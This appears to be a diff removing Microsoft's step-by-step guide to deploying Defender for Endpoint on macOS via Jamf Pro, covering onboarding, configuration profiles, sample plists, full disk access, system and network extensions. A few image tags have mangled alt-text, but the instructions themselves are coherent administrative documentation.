-11. [Schedule scans with Microsoft Defender for Endpoint on macOS](#step-11-schedule-scans-with-microsoft-defender-for-endpoint-on-macos)
-12. [Deploy Microsoft Defender for Endpoint on macOS](#step-12-deploy-microsoft-defender-for-endpoint-on-macos)
-
-## Step 1: Get the Microsoft Defender for Endpoint onboarding package
-
-1. In [Microsoft Defender XDR](https://security.microsoft.com), navigate to **Settings > Endpoints > Onboarding**.
-
-2. Select macOS as the operating system and Mobile Device Management / Microsoft Intune as the deployment method.
-
- :::image type="content" source="media/onboarding-macos.png" alt-text="The Settings page." lightbox="media/onboarding-macos.png":::
-
-3. Select **Download onboarding package** (WindowsDefenderATPOnboardingPackage.zip).
-
-4. Extract `WindowsDefenderATPOnboardingPackage.zip`.
-
-5. Copy the file to your preferred location. For example, `C:\Users\JaneDoe_or_JohnDoe.contoso\Downloads\WindowsDefenderATPOnboardingPackage_macOS_MDM_contoso\jamf\WindowsDefenderATPOnboarding.plist`.
-
-## Step 2: Create a configuration profile in Jamf Pro using the onboarding package
-
-1. Locate the file `WindowsDefenderATPOnboarding.plist` from the previous section.
-
- :::image type="content" source="media/plist-onboarding-file.png" alt-text="The Windows Defender ATP Onboarding file." lightbox="media/plist-onboarding-file.png":::
-
-2. Sign in to Jamf Pro, navigate to **Computers** > **Configuration Profiles**, and select **New**.
-
- :::image type="content" source="media/jamf-pro-configure-profile.png" alt-text="The page on which you create a new Jamf Pro dashboard." lightbox="media/jamf-pro-configure-profile.png":::
-
-3. Enter the following details in the **General** tab:
-
- - Name: MDE onboarding for macOS
- - Description: MDE EDR onboarding for macOS
- - Category: None
- - Distribution Method: Install Automatically
- - Level: Computer Level
-
-4. Navigate to the **Application & Custom Settings** page and select **Upload** > **Add**.
-
- :::image type="content" source="media/jamfpro-mac-profile.png" alt-text="The configuration app and custom settings." lightbox="media/jamfpro-mac-profile.png":::
-
-5. Select **Upload File (PLIST file)** then in **Preference Domain** enter: `com.microsoft.wdav.atp`.
-
- :::image type="content" source="media/jamfpro-plist-upload.png" alt-text="The jamfpro plist upload file." lightbox="media/jamfpro-plist-upload.png":::
-
- :::image type="content" source="media/jamfpro-plist-file.png" alt-text="The upload file property List file." lightbox="media/jamfpro-plist-file.png":::
-
-6. Select **Open** and select the onboarding file.
-
- :::image type="content" source="media/jamfpro-plist-file-onboard.png" alt-text="The onboarding file." lightbox="media/jamfpro-plist-file-onboard.png":::
-
-7. Select **Upload**.
-
- :::image type="content" source="media/jamfpro-upload-plist.png" alt-text="The uploading plist file." lightbox="media/jamfpro-upload-plist.png":::
-
-8. Select the **Scope** tab.
-
- :::image type="content" source="media/jamfpro-scope-tab.png" alt-text="The Scope tab." lightbox="media/jamfpro-scope-tab.png":::
-
-9. Select the target computers.
-
- :::image type="content" source="media/jamfpro-target-computer.png" alt-text="The target computers." lightbox="media/jamfpro-target-computer.png":::
-
- :::image type="content" source="media/jamfpro-targets.png" alt-text="The targets." lightbox="media/jamfpro-targets.png":::
-
-10. Select **Save**.
-
- :::image type="content" source="media/jamfpro-deployment-target.png" alt-text="The deployment of target computers." lightbox="media/jamfpro-deployment-target.png":::
-
- :::image type="content" source="media/jamfpro-target-selected.png" alt-text="The selection of target computers." lightbox="media/jamfpro-target-selected.png":::
-
-11. Select **Done**.
-
- :::image type="content" source="media/jamfpro-target-group.png" alt-text="The computers of a target group." lightbox="media/jamfpro-target-group.png":::
-
- :::image type="content" source="media/jamfpro-configuration-policies.png" alt-text="The list of configuration profiles." lightbox="media/jamfpro-configuration-policies.png":::
-
-## Step 3: Configure Microsoft Defender for Endpoint settings
-
-You can either use JAMF Pro GUI to edit individual settings of the Microsoft Defender for Endpoint configuration, or use the legacy method by creating a configuration Plist in a text editor, and uploading it to JAMF Pro.
-
-Note that you must use exact `com.microsoft.wdav` as the **Preference Domain**, Microsoft Defender for Endpoint uses only this name and `com.microsoft.wdav.ext` to load its managed settings!
-
-(The `com.microsoft.wdav.ext` version may be used in rare cases when you prefer to use GUI method, but also need to configure a setting that has not been added to the schema yet.)
-
-### GUI method
-
-1. Download schema.json file from [Defender's GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/schema) and save it to a local file:
-
- ```bash
- curl -o ~/Documents/schema.json https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/schema/schema.json
- ```
-
-2. Create a new Configuration Profile under Computers -> Configuration Profiles, enter the following details on the **General** tab:
-
- :::image type="content" source="media/644e0f3af40c29e80ca1443535b2fe32.png" alt-text="A new profile." lightbox="media/644e0f3af40c29e80ca1443535b2fe32.png":::
-
- - Name: MDATP MDAV configuration settings
- - Description:\<blank\>
- - Category: None (default)
- - Level: Computer Level (default)
- - Distribution Method: Install Automatically (default)
-
-3. Scroll down to the **Application & Custom Settings** tab, select **External Applications**, click **Add** and use **Custom Schema** as Source to use for the preference domain.
-
- :::image type="content" source="media/4137189bc3204bb09eed3aabc41afd78.png" alt-text="Add custom schema." lightbox="media/4137189bc3204bb09eed3aabc41afd78.png":::
-
-4. Enter `com.microsoft.wdav` as the Preference Domain, select **Add Schema** and **Upload** the schema.json file downloaded on Step 1. Click **Save**.
-
- :::image type="content" source="media/a6f9f556037c42fabcfdcb1b697244cf.png" alt-text="Upload schema." lightbox="media/a6f9f556037c42fabcfdcb1b697244cf.png":::
-
-5. You can see all supported Microsoft Defender for Endpoint configuration settings below, under **Preference Domain Properties**. Click **Add/Remove properties** to select the settings that you want to be managed, and click **Ok** to save your changes. (Settings left unselected will not be included into the managed configuration, an end user will be able to configure those settings on their machines.)
-
- :::image type="content" source="media/817b3b760d11467abe9bdd519513f54f.png" alt-text="The chosen managed settings." lightbox="media/817b3b760d11467abe9bdd519513f54f.png":::
-
-6. Change values of the settings to desired values. You can click **More information** to get documentation for a particular setting. (You may click **Plist preview** to inspect what the configuration plist will look like. Click **Form editor** to return to the visual editor.)
-
- :::image type="content" source="media/a14a79efd5c041bb8974cb5b12b3a9b6.png" alt-text="The page on which you change the settings values." lightbox="media/a14a79efd5c041bb8974cb5b12b3a9b6.png":::
-
-7. Select the **Scope** tab.
-
- :::image type="content" source="media/9fc17529e5577eefd773c658ec576a7d.png" alt-text="The Configuration profile scope." lightbox="media/9fc17529e5577eefd773c658ec576a7d.png":::
-
-8. Select **Contoso's Machine Group**.
-
-9. Select **Add**, then select **Save**.
-
- :::image type="content" source="media/cf30438b5512ac89af1d11cbf35219a6.png" alt-text="The page on which you can add the Configuration settings." lightbox="media/cf30438b5512ac89af1d11cbf35219a6.png":::
-
- :::image type="content" source="media/6f093e42856753a3955cab7ee14f12d9.png" alt-text="The page on which you can save the Configuration settings." lightbox="media/6f093e42856753a3955cab7ee14f12d9.png":::
-
-10. Select **Done**. You'll see the new **Configuration profile**.
-
- :::image type="content" source="media/dd55405106da0dfc2f50f8d4525b01c8.png" alt-text="The page on which you complete the Configuration settings." lightbox="media/dd55405106da0dfc2f50f8d4525b01c8.png":::
-
-Microsoft Defender for Endpoint adds new settings over time. These new settings will be added to the schema, and a new version will be published to GitHub.
-All you need to do to have updates is to download an updated schema, edit existing configuration profile, and **Edit schema** at the **Application & Custom Settings** tab.
-
-### Legacy method
-
-1. Use the following Microsoft Defender for Endpoint configuration settings:
-
- - enableRealTimeProtection
- - passiveMode
-
- > [!NOTE]
- > Not turned on by default, if you are planning to run a third-party AV for macOS, set it to `true`.
-
- - exclusions
- - excludedPath
- - excludedFileExtension
- - excludedFileName
- - exclusionsMergePolicy
- - allowedThreats
-
- > [!NOTE]
- > EICAR is on the sample, if you are going through a proof-of-concept, remove it especially if you are testing EICAR.
-
- - disallowedThreatActions
- - potentially_unwanted_application
- - archive_bomb
- - cloudService
- - automaticSampleSubmission
- - tags
- - hideStatusMenuIcon
-
- For information, see [Property list for JAMF full configuration profile](mac-preferences.md#property-list-for-jamf-full-configuration-profile).
-
- ```XML
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
- <plist version="1.0">
- <dict>
- <key>antivirusEngine</key>
- <dict>
- <key>enableRealTimeProtection</key>
- <true/>
- <key>passiveMode</key>
- <false/>
- <key>exclusions</key>
- <array>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <false/>
- <key>path</key>
- <string>/var/log/system.log</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <true/>
- <key>path</key>
- <string>/home</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileExtension</string>
- <key>extension</key>
- <string>pdf</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileName</string>
- <key>name</key>
- <string>cat</string>
- </dict>
- </array>
- <key>exclusionsMergePolicy</key>
- <string>merge</string>
- <key>allowedThreats</key>
- <array>
- <string>EICAR-Test-File (not a virus)</string>
- </array>
- <key>disallowedThreatActions</key>
- <array>
- <string>allow</string>
- <string>restore</string>
- </array>
- <key>threatTypeSettings</key>
- <array>
- <dict>
- <key>key</key>
- <string>potentially_unwanted_application</string>
- <key>value</key>
- <string>block</string>
- </dict>
- <dict>
- <key>key</key>
- <string>archive_bomb</string>
- <key>value</key>
- <string>audit</string>
- </dict>
- </array>
- <key>threatTypeSettingsMergePolicy</key>
- <string>merge</string>
- </dict>
- <key>cloudService</key>
- <dict>
- <key>enabled</key>
- <true/>
- <key>diagnosticLevel</key>
- <string>optional</string>
- <key>automaticSampleSubmission</key>
- <true/>
- </dict>
- <key>edr</key>
- <dict>
- <key>tags</key>
- <array>
- <dict>
- <key>key</key>
- <string>GROUP</string>
- <key>value</key>
- <string>ExampleTag</string>
- </dict>
- </array>
- </dict>
- <key>userInterface</key>
- <dict>
- <key>hideStatusMenuIcon</key>
- <false/>
- </dict>
- </dict>
- </plist>
- ```
-
-2. Save the file as `MDATP_MDAV_configuration_settings.plist`.
-
-3. In the Jamf Pro dashboard, open **Computers**, and their **Configuration Profiles**. Click **New** and switch to the **General** tab.
-
- :::image type="content" source="media/644e0f3af40c29e80ca1443535b2fe32.png" alt-text="The page displaying a new profile." lightbox="media/644e0f3af40c29e80ca1443535b2fe32.png":::
-
-4. Enter the following details on the **General** tab:
-
- - Name: MDATP MDAV configuration settings
- - Description:\<blank\>
- - Category: None (default)
- - Distribution Method: Install Automatically (default)
- - Level: Computer Level (default)
-
-5. In **Application & Custom Settings**, select **Configure**.
-
- :::image type="content" source="mediAV configuration settings." lightbox="media/3160906404bc5a2edf84d1d015894e3b.png":::
-
- :::image type="content" source="media/e1cc1e48ec9d5d688087b4d771e668d2.png" alt-text="The application and custom settings." lightbox="media/e1cc1e48ec9d5d688087b4d771e668d2.png":::
-
-6. Select **Upload File (PLIST file)**.
-
- :::image type="content" source="media/6f85269276b2278eca4bce84f935f87b.png" alt-text="The configuration settings plist file." lightbox="media/6f85269276b2278eca4bce84f935f87b.png":::
-
-7. In **Preferences Domain**, enter `com.microsoft.wdav`, then select **Upload PLIST File**.
-
- :::image type="content" source="media/db15f147dd959e872a044184711d7d46.png" alt-text="The configuration settings preferences domain." lightbox="media/db15f147dd959e872a044184711d7d46.png":::
-
-8. Select **Choose File**.
-
- :::image type="content" source="media/526e978761fc571cca06907da7b01fd6.png" alt-text="The prompt to choose the plist file." lightbox="media/526e978761fc571cca06907da7b01fd6.png":::
-
-9. Select the **MDATP_MDAV_configuration_settings.plist**, then select **Open**.
-
- :::image type="content" source="mediav configuration settings." lightbox="media/98acea3750113b8dbab334296e833003.png":::
-
-10. Select **Upload**.
-
- :::image type="content" source="media/0adb21c13206861ba9b30a879ade93d3.png" alt-text="The configuration setting upload." lightbox="media/0adb21c13206861ba9b30a879ade93d3.png":::
-
- :::image type="content" source="media/f624de59b3cc86e3e2d32ae5de093e02.png" alt-text="The prompt to upload the image related to the configuration settings." lightbox="media/f624de59b3cc86e3e2d32ae5de093e02.png":::
-
- > [!NOTE]
- > If you happen to upload the Intune file, you'll get the following error:
- >
- > :::image type="content" source="media/8e69f867664668796a3b2904896f0436.png" alt-text="The prompt to upload the intune file related to the configuration settings." lightbox="media/8e69f867664668796a3b2904896f0436.png":::
-
-11. Select **Save**.
-
- :::image type="content" source="media/1b6b5a4edcb42d97f1e70a6a0fa48e3a.png" alt-text="The option to save the image related to the configuration settings." lightbox="media/1b6b5a4edcb42d97f1e70a6a0fa48e3a.png":::
-
-12. The file is uploaded.
-
- :::image type="content" source="media/33e2b2a1611fdddf6b5b79e54496e3bb.png" alt-text="The uploaded file related to the configuration settings." lightbox="media/33e2b2a1611fdddf6b5b79e54496e3bb.png":::
-
- :::image type="content" source="media/a422e57fe8d45689227e784443e51bd1.png" alt-text="The configuration settings page." lightbox="media/a422e57fe8d45689227e784443e51bd1.png":::
-
-13. Select the **Scope** tab.
-
- :::image type="content" source="media/9fc17529e5577eefd773c658ec576a7d.png" alt-text="The scope for the configuration settings." lightbox="media/9fc17529e5577eefd773c658ec576a7d.png":::
-
-14. Select **Contoso's Machine Group**.
-
-15. Select **Add**, then select **Save**.
-
- :::image type="content" source="media/cf30438b5512ac89af1d11cbf35219a6.png" alt-text="The configuration settings addsav." lightbox="media/cf30438b5512ac89af1d11cbf35219a6.png":::
-
- :::image type="content" source="media/6f093e42856753a3955cab7ee14f12d9.png" alt-text="The notification of configuration settings." lightbox="media/6f093e42856753a3955cab7ee14f12d9.png":::
-
-16. Select **Done**. You'll see the new **Configuration profile**.
-
- ![Image of configuration settings config profile image.](media/dd55405106da0dfc2f50f8d4525b01c8.png)
- :::image type="content" source="media/dd55405106da0dfc2f50f8d4525b01c8.png" alt-text="The config profile's settings." lightbox="media/dd55405106da0dfc2f50f8d4525b01c8.png":::
-
-## Step 4: Configure notifications settings
-
-These steps are applicable on macOS 11 (Big Sur) or later.
-
-1. In the Jamf Pro dashboard, select **Computers**, then **Configuration Profiles**.
-
-2. Click **New**, and enter the following details in the **General** tab for **Options**:
-
- - **Name**: MDATP MDAV Notification settings
- - **Description**: macOS 11 (Big Sur) or later
- - **Category**: None *(default)*
- - **Distribution Method**: Install Automatically *(default)*
- - **Level**: Computer Level *(default)*
-
- :::image type="content" source="media/c9820a5ff84aaf21635c04a23a97ca93.png" alt-text="The new macOS configuration profile page." lightbox="media/c9820a5ff84aaf21635c04a23a97ca93.png":::
-
- - Tab **Notifications**, click **Add**, and enter the following values:
- - **Bundle ID**: `com.microsoft.wdav.tray`
- - **Critical Alerts**: Click **Disable**
- - **Notifications**: Click **Enable**
- - **Banner alert type**: Select **Include** and **Temporary** *(default)*
- - **Notifications on lock screen**: Click **Hide**
- - **Notifications in Notification Center**: Click **Display**
- - **Badge app icon**: Click **Display**
-
- :::image type="content" source="mediav notifications tray." lightbox="media/7f9138053dbcbf928e5182ee7b295ebe.png":::
-
- - Tab **Notifications**, click **Add** one more time, scroll down to **New Notifications Settings**
- - **Bundle ID**: `com.microsoft.autoupdate.fba`
- - Configure the rest of the settings to the same values as above
-
- :::image type="content" source="mediav notifications mau." lightbox="media/4bac6ce277aedfb4a674f2d9fcb2599a.png":::
-
- Note that now you have two 'tables' with notification configurations, one for **Bundle ID: com.microsoft.wdav.tray**, and another for **Bundle ID: com.microsoft.autoupdate.fba**. While you can configure alert settings per your requirements, Bundle IDs must be exactly the same as described before, and **Include** switch must be **On** for **Notifications**.
-
-3. Select the **Scope** tab, then select **Add**.
-
- :::image type="content" source="media/441aa2ecd36abadcdd8aed03556080b5.png" alt-text="The page on which you can add values for the configuration settings." lightbox="media/441aa2ecd36abadcdd8aed03556080b5.png":::
-
-4. Select **Contoso's Machine Group**.
-
-5. Select **Add**, then select **Save**.
-
- :::image type="content" source="media/09a275e321268e5e3ac0c0865d3e2db5.png" alt-text="The page on which you can save values for the configuration settings contoso machine group." lightbox="media/09a275e321268e5e3ac0c0865d3e2db5.png":::
-
- :::image type="content" source="media/4d2d1d4ee13d3f840f425924c3df0d51.png" alt-text="The page that displays the completion notification of the configuration settings." lightbox="media/4d2d1d4ee13d3f840f425924c3df0d51.png":::
-
-6. Select **Done**. You'll see the new **Configuration profile**.
-
- :::image type="content" source="media/633ad26b8bf24ec683c98b2feb884bdf.png" alt-text="The completed configuration settings." lightbox="media/633ad26b8bf24ec683c98b2feb884bdf.png":::
-
-## Step 5: Configure Microsoft AutoUpdate (MAU)
-
-1. Use the following Microsoft Defender for Endpoint configuration settings:
-
- ```XML
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
- <plist version="1.0">
- <dict>
- <key>ChannelName</key>
- <string>Current</string>
- <key>HowToCheck</key>
- <string>AutomaticDownload</string>
- <key>EnableCheckForUpdatesButton</key>
- <true/>
- <key>DisableInsiderCheckbox</key>
- <false/>
- <key>SendAllTelemetryEnabled</key>
- <true/>
- </dict>
- </plist>
- ```
-
-2. Save it as `MDATP_MDAV_MAU_settings.plist`.
-
-3. In the Jamf Pro dashboard, select **General**.
-
- :::image type="content" source="media/eaba2a23dd34f73bf59e826217ba6f15.png" alt-text="The configuration settings." lightbox="media/eaba2a23dd34f73bf59e826217ba6f15.png":::
-
-4. Enter the following details on the **General** tab:
-
- - Name: MDATP MDAV MAU settings
- - Description: Microsoft AutoUpdate settings for MDATP for macOS
- - Category: None (default)
- - Distribution Method: Install Automatically(default)
- - Level: Computer Level(default)
-
-5. In **Application & Custom Settings** select **Configure**.
-
- :::image type="content" source="media/1f72e9c15eaafcabf1504397e99be311.png" alt-text="The configuration setting application and custom settings." lightbox="media/1f72e9c15eaafcabf1504397e99be311.png":::
-
-6. Select **Upload File (PLIST file)**.
-
-7. In **Preference Domain** enter: `com.microsoft.autoupdate2`, then select **Upload PLIST File**.
-
- :::image type="content" source="media/1213872db5833aa8be535da57653219f.png" alt-text="The configuration setting preference domain." lightbox="media/1213872db5833aa8be535da57653219f.png":::
-
-
-8. Select **Choose File**.
-
- :::image type="content" source="media/335aff58950ce62d1dabc289ecdce9ed.png" alt-text="The prompt to choose the file regarding configuration setting." lightbox="media/335aff58950ce62d1dabc289ecdce9ed.png":::
-
-9. Select **MDATP_MDAV_MAU_settings.plist**.
-
- :::image type="content" source="mediavmau settings." lightbox="media/a26bd4967cd54bb113a2c8d32894c3de.png":::
-
-10. Select **Upload**.
- :::image type="content" source="media/4239ca0528efb0734e4ca0b490bfb22d.png" alt-text="The upload of the file regarding configuration setting." lightbox="media/4239ca0528efb0734e4ca0b490bfb22d.png":::
-
- :::image type="content" source="media/4ec20e72c8aed9a4c16912e01692436a.png" alt-text="The page displaying the upload option for the file regarding configuration setting." lightbox="media/4ec20e72c8aed9a4c16912e01692436a.png":::
-
-11. Select **Save**.
-
- :::image type="content" source="media/253274b33e74f3f5b8d475cf8692ce4e.png" alt-text="The page displaying the save option for the file regarding configuration setting." lightbox="media/253274b33e74f3f5b8d475cf8692ce4e.png":::
-
-12. Select the **Scope** tab.
-
- :::image type="content" source="media/10ab98358b2d602f3f67618735fa82fb.png" alt-text="The Scope tab for the configuration settings." lightbox="media/10ab98358b2d602f3f67618735fa82fb.png":::
-
-13. Select **Add**.
-
- :::image type="content" source="media/56e6f6259b9ce3c1706ed8d666ae4947.png" alt-text="The option to add deployment targets." lightbox="media/56e6f6259b9ce3c1706ed8d666ae4947.png":::
-
- :::image type="content" source="media/38c67ee1905c4747c3b26c8eba57726b.png" alt-text="The page on which you add more values to the configuration settings." lightbox="media/38c67ee1905c4747c3b26c8eba57726b.png":::
-
- :::image type="content" source="media/321ba245f14743c1d5d51c15e99deecc.png" alt-text="The page on which you can add more values to the configuration settings." lightbox="media/321ba245f14743c1d5d51c15e99deecc.png":::
-
-14. Select **Done**.
-
- :::image type="content" source="media/ba44cdb77e4781aa8b940fb83e3c21f7.png" alt-text="The completion notification regarding the configuration settings." lightbox="media/ba44cdb77e4781aa8b940fb83e3c21f7.png":::
-
-## Step 6: Grant full disk access to Microsoft Defender for Endpoint
-
-1. In the Jamf Pro dashboard, select **Configuration Profiles**.
-
- :::image type="content" source="media/264493cd01e62c7085659d6fdc26dc91.png" alt-text="The profile for which settings are to be configured." lightbox="media/264493cd01e62c7085659d6fdc26dc91.png":::
-
-2. Select **+ New**.
-
-3. Enter the following details on the **General** tab:
-
- - Name: MDATP MDAV - grant Full Disk Access to EDR and AV
- - Description: On macOS 11 (Big Sur) or later, the new Privacy Preferences Policy Control
- - Category: None
- - Distribution method: Install Automatically
- - Level: Computer level
-
- :::image type="content" source="media/ba3d40399e1a6d09214ecbb2b341923f.png" alt-text="The configuration setting in general." lightbox="media/ba3d40399e1a6d09214ecbb2b341923f.png":::
-
-
-4. In **Configure Privacy Preferences Policy Control** select **Configure**.
-
- :::image type="content" source="media/715ae7ec8d6a262c489f94d14e1e51bb.png" alt-text="The configuration privacy policy control." lightbox="media/715ae7ec8d6a262c489f94d14e1e51bb.png":::
-
-5. In **Privacy Preferences Policy Control**, enter the following details:
-
- - Identifier: `com.microsoft.wdav`
- - Identifier Type: Bundle ID
- - Code Requirement: `identifier "com.microsoft.wdav" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9`
-
- :::image type="content" source="media/22cb439de958101c0a12f3038f905b27.png" alt-text="The configuration setting privacy preference policy control details." lightbox="media/22cb439de958101c0a12f3038f905b27.png":::
-
-6. Select **+ Add**.
-
- :::image type="content" source="media/bd93e78b74c2660a0541af4690dd9485.png" alt-text="The configuration setting add system policy all files option." lightbox="media/bd93e78b74c2660a0541af4690dd9485.png":::
-
- - Under App or service: Set to **SystemPolicyAllFiles**
-
- - Under "access": Set to **Allow**
-
-7. Select **Save** (not the one at the bottom right).
-
- :::image type="content" source="media/6de50b4a897408ddc6ded56a09c09fe2.png" alt-text="The save operation for the configuration setting." lightbox="media/6de50b4a897408ddc6ded56a09c09fe2.png":::
-
-8. Click the `+` sign next to **App Access** to add a new entry.
-
- :::image type="content" source="media/tcc-add-entry.png" alt-text="The save operation relating to the configuration setting." lightbox="media/tcc-add-entry.png":::
-
-9. Enter the following details:
-
- - Identifier: `com.microsoft.wdav.epsext`
- - Identifier Type: Bundle ID
- - Code Requirement: `identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9`
-
-10. Select **+ Add**.
-
- :::image type="content" source="media/tcc-epsext-entry.png" alt-text="The configuration setting tcc epsext entry." lightbox="media/tcc-epsext-entry.png":::
-
- - Under App or service: Set to **SystemPolicyAllFiles**
-
- - Under "access": Set to **Allow**
-
-11. Select **Save** (not the one at the bottom right).
-
- :::image type="content" source="media/tcc-epsext-entry2.png" alt-text="The other instance of configuration setting tcc epsext." lightbox="media/tcc-epsext-entry2.png":::
-
-12. Select the **Scope** tab.
-
- :::image type="content" source="media/2c49b16cd112729b3719724f581e6882.png" alt-text="The page depicting the scope for the configuration setting." lightbox="media/2c49b16cd112729b3719724f581e6882.png":::
-
-13. Select **+ Add**.
-
- :::image type="content" source="media/57cef926d1b9260fb74a5f460cee887a.png" alt-text="The page depicting the configuration setting." lightbox="media/57cef926d1b9260fb74a5f460cee887a.png":::
-
-14. Select **Computer Groups** > under **Group Name** > select **Contoso's MachineGroup**.
-
- :::image type="content" source="media/368d35b3d6179af92ffdbfd93b226b69.png" alt-text="The configuration setting contoso machine group." lightbox="media/368d35b3d6179af92ffdbfd93b226b69.png":::
-
-15. Select **Add**.
-
-16. Select **Save**.
-
-17. Select **Done**.
-
- :::image type="content" source="media/809cef630281b64b8f07f20913b0039b.png" alt-text="The configuration setting contoso machine-group." lightbox="media/809cef630281b64b8f07f20913b0039b.png":::
-
- :::image type="content" source="media/6c8b406ee224335a8c65d06953dc756e.png" alt-text="The configuration setting illustration." lightbox="media/6c8b406ee224335a8c65d06953dc756e.png":::
-
-Alternatively, you can download [fulldisk.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig) and upload it to JAMF Configuration Profiles as described in [Deploying Custom Configuration Profiles using Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro](https://www.jamf.com/jamf-nation/articles/648/deploying-custom-configuration-profiles-using-jamf-pro).
-
-> [!NOTE]
-> Full Disk Access granted through Apple MDM Configuration Profile is not reflected in System Settings => Privacy & Security => Full Disk Access.
-
-## Step 7: Approve System extensions for Microsoft Defender for Endpoint
-
-1. In the **Configuration Profiles**, select **+ New**.
-
- :::image type="content" source="media/6c8b406ee224335a8c65d06953dc756e.png" alt-text="The automatically generated social media post's description." lightbox="media/6c8b406ee224335a8c65d06953dc756e.png":::
-
-2. Enter the following details on the **General** tab:
-
- - Name: MDATP MDAV System Extensions
- - Description: MDATP system extensions
- - Category: None
- - Distribution Method: Install Automatically
- - Level: Computer Level
-
- :::image type="content" source="media/sysext-new-profile.png" alt-text="The configuration settings sysext new profile." lightbox="media/sysext-new-profile.png":::
-
-3. In **System Extensions** select **Configure**.
-
- :::image type="content" source="media/sysext-configure.png" alt-text="The pane with the Configure option for the system extensions." lightbox="media/sysext-configure.png":::
-
-4. In **System Extensions**, enter the following details:
-
- - Display Name: Microsoft Corp. System Extensions
- - System Extension Types: Allowed System Extensions
- - Team Identifier: UBF8T346G9
- - Allowed System Extensions:
- - **com.microsoft.wdav.epsext**
- - **com.microsoft.wdav.netext**
-
- :::image type="content" source="mediAV system extensions pane." lightbox="media/sysext-configure2.png":::
-
-5. Select the **Scope** tab.
-
- :::image type="content" source="media/0df36fc308ba569db204ee32db3fb40a.png" alt-text="The Target Computers selection pane." lightbox="media/0df36fc308ba569db204ee32db3fb40a.png":::
-
-6. Select **+ Add**.
-
-7. Select **Computer Groups** > under **Group Name** > select **Contoso's Machine Group**.
-
-8. Select **+ Add**.
-
- :::image type="content" source="media/0dde8a4c41110dbc398c485433a81359.png" alt-text="The New macOS Configuration Profile pane." lightbox="media/0dde8a4c41110dbc398c485433a81359.png":::
-
-9. Select **Save**.
-
- :::image type="content" source="mediAV System Extensions." lightbox="media/sysext-scope.png":::
-
-10. Select **Done**.
-
- :::image type="content" source="media/sysext-final.png" alt-text="The configuration settings sysext - final." lightbox="media/sysext-final.png":::
-
-## Step 8: Configure Network Extension
-
-As part of the Endpoint Detection and Response capabilities, Microsoft Defender for Endpoint on macOS inspects socket traffic and reports this information to the Microsoft Defender portal. The following policy allows the network extension to perform this functionality.
-
-These steps are applicable on macOS 11 (Big Sur) or later.
-
-1. In the Jamf Pro dashboard, select **Computers**, then **Configuration Profiles**.
-
-2. Click **New**, and enter the following details for **Options**:
-
- - Tab **General**:
- - **Name**: Microsoft Defender Network Extension
- - **Description**: macOS 11 (Big Sur) or later
- - **Category**: None *(default)*
- - **Distribution Method**: Install Automatically *(default)*
- - **Level**: Computer Level *(default)*
-
- - Tab **Content Filter**:
- - **Filter Name**: Microsoft Defender Content Filter
- - **Identifier**: `com.microsoft.wdav`
- - Leave **Service Address**, **Organization**, **User Name**, **Password**, **Certificate** blank (**Include** is *not* selected)
- - **Filter Order**: Inspector
- - **Socket Filter**: `com.microsoft.wdav.netext`
- - **Socket Filter Designated Requirement**: `identifier "com.microsoft.wdav.netext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9`
- - Leave **Network Filter** fields blank (**Include** is *not* selected)
-
- Note that **Identifier**, **Socket Filter** and **Socket Filter Designated Requirement** exact values as specified above.
-
- :::image type="content" source="mediav configuration setting." lightbox="media/netext-create-profile.png":::
-
-3. Select the **Scope** tab.
-
- :::image type="content" source="media/0df36fc308ba569db204ee32db3fb40a.png" alt-text="The configuration settings sco tab." lightbox="media/0df36fc308ba569db204ee32db3fb40a.png":::
-
-4. Select **+ Add**.
-
-5. Select **Computer Groups** > under **Group Name** > select **Contoso's Machine Group**.
-
-6. Select **+ Add**.
-
- :::image type="content" source="media/0dde8a4c41110dbc398c485433a81359.png" alt-text="The configuration settings adim." lightbox="media/0dde8a4c41110dbc398c485433a81359.png":::
-
-7. Select **Save**.
-
- :::image type="content" source="media/netext-scope.png" alt-text="The Content Filter pane." lightbox="media/netext-scope.png":::
-
-8. Select **Done**.
-
- :::image type="content" source="media/netext-final.png" alt-text="The configuration settings netext - final." lightbox="media/netext-final.png":::
-
-Alternatively, you can download [netfilter.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/netfilter.mobileconfig) and upload it to JAMF Configuration Profiles as described in [Deploying Custom Configuration Profiles using Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro](https://www.jamf.com/jamf-nation/articles/648/deploying-custom-configuration-profiles-using-jamf-pro).
-
-## Step 9: Configure Background Services
-
- > [!CAUTION]
- > macOS 13 (Ventura) contains new privacy enhancements. Beginning with this version, by default, applications cannot run in background without explicit consent. Microsoft Defender for Endpoint must run its daemon process in background.
- >
- > This configuration profile grants Background Service permissions to Microsoft Defender for Endpoint. If you previously configured Microsoft Defender for Endpoint through JAMF, we recommend you update the deployment with this configuration profile.
-
-Download [**background_services.mobileconfig**](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/background_services.mobileconfig) from [our GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
